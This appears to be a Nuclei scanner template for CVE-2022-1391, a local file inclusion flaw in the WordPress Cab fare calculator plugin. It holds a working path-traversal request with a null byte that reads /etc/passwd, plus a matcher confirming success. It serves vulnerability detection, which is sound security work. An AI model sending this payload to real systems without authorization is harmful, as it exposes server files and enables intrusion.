47 lines
1.8 KiB
YAML
47 lines
1.8 KiB
YAML
id: CVE-2022-1391
|
|
|
|
info:
|
|
name: WordPress Cab fare calculator < 1.0.4 - Local File Inclusion
|
|
author: Splint3r7
|
|
severity: critical
|
|
description: |
|
|
The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to read sensitive files on the server, potentially exposing sensitive information.
|
|
remediation: |
|
|
Update to the latest version of the WordPress Cab fare calculator plugin (1.0.4) to fix the local file inclusion vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/50843
|
|
- https://wordpress.org/plugins/cab-fare-calculator
|
|
- https://wpscan.com/vulnerability/680121fe-6668-4c1a-a30d-e70dd9be5aac
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1391
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-1391
|
|
cwe-id: CWE-22
|
|
epss-score: 0.03037
|
|
epss-percentile: 0.89951
|
|
cpe: cpe:2.3:a:kanev:cab_fare_calculator:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: kanev
|
|
product: cab_fare_calculator
|
|
framework: wordpress
|
|
tags: cve,cve2022,wordpress,wp-plugin,lfi,wp,edb,wpscan,kanev
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a004630440220192d0a19afc8dd002d8b6445233984375e74bed8b233031e9ad20d7eb3c3f62202207249f163c2be5602fadf93fc133fd9fa4fbde5e7c52523ed1b35edd88d1ca0ba:922c64590222798bb761d5b6d8e72950 |